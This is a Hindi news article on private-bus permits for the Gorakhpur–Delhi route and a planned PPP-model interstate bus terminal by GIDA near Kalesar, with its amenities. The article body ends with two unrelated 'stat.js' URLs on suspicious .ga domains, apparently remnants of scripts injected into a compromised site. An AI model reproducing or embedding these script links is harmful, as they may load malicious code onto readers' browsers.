पुर्वान्चल के लोगो व पर्यटको के लिए बसों को लेकर एक राहत भारी खबर। अब आगरा,पटना, दिल्ली, अमृतसर जयपुर और भोपाल सहित विभिन्न श्रेत्रो की यात्रा सुगम हो जायेगी। अब रोडवेज बसों की निर्भर्ता समाप्त हो जायेगी क्योकि शाशन अब 25 फीसदी प्राइवेट बसों को परमिट जारी कर चुका है।

 

शासन की पहल पर गोरखपुर – दिल्ली रूट पर प्राइवेट बसों को परमिट जारी करने की अनुमति के साथ ही गीडा प्रशासन ने गोरखपुर में अंतरराज्यीय टर्मिनल बनाने की प्रक्रिया भी शुरू कर दी है। आने वाले कुछ दिनों में अति आधुनिक गीडा टर्मिनल से देश भर में प्राइवेट बसें चलाई जाएंगी। गोरखपुर औद्योगिक प्राधिकरण (गीडा) ने प्राइवेट बस टर्मिनल निर्माण के लिए कालेसर के पास हाईवे के समीप 10 एकड़ भूमि चिन्हित कर लिया है।

 

 

टर्मिनल का निर्माण पब्लिक प्राइवेट पार्टर्नरशिप (पीपीपी मॉडल) के आधार पर किया जाएगा। गीडा क्षेत्र के साथ टर्मिनल के विकास के लिए कई विदेशी कंपनियां इच्छुक हैं। गीडा ने एक अमेरिकी कंपनी को टर्मिनल के डटेल प्रोजेक्ट रिपोर्ट (डीपीआर) के लिए आमंत्रित भी किया है। दोनों पक्ष में वार्ता जारी है। यहां जान लें कि गोरखपुर से जल्द ही प्राइवेट बसों का संचालन शुरू हो जाएगा। प्रथम चनरण में गोरखपुर-दिल्ली रूट पर रोडवेज के सापेक्ष 25 फीसदी प्राइवेट बसों को परमिट जारी किया जाएगा।
यात्रियों को मिलेंगी उच्चस्तरीय सुविधाएं

 

 

टर्मिनल में देश भर से विभिन्न क्षेत्रों की प्राइवेट बस सेवाओं का आवागमन होगा। यात्रियों को उच्‍चस्तरीय सुविधाएं प्रदान करी जाएंगी। परिसर में तीन मंजिला भव्य प्रशासनिक भवन बनाया जाएगा। प्रथम तल पर प्रशासनिक कार्य करे जाएंगे। द्वितीय तल पर यात्रियों के लिए फूड प्लाजा और कांप्लेक्स बनेगा। तीसरी मंजिल पर यात्रियों के लिए रिटायरिंग रूम और डारमेट्री की व्यवस्था करी जायेगी। व्यावसायिक कांप्लेक्स भी बनाया जाएगा। बसों के लिए अलग-अलग प्लेटफार्म होंगे। सीसीटीवी कैमरे से निगरानी के साथ बसों की अपडेट जानकारी मिलती रहेगी। एसी वेटिंग हॉल अति आधुनिक होंगे, जिसमें मनोरंजन के साधन उपलब्ध होंगे। आधुनिक प्रशासन केंद्र की भी व्यवस्था रहेगी।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.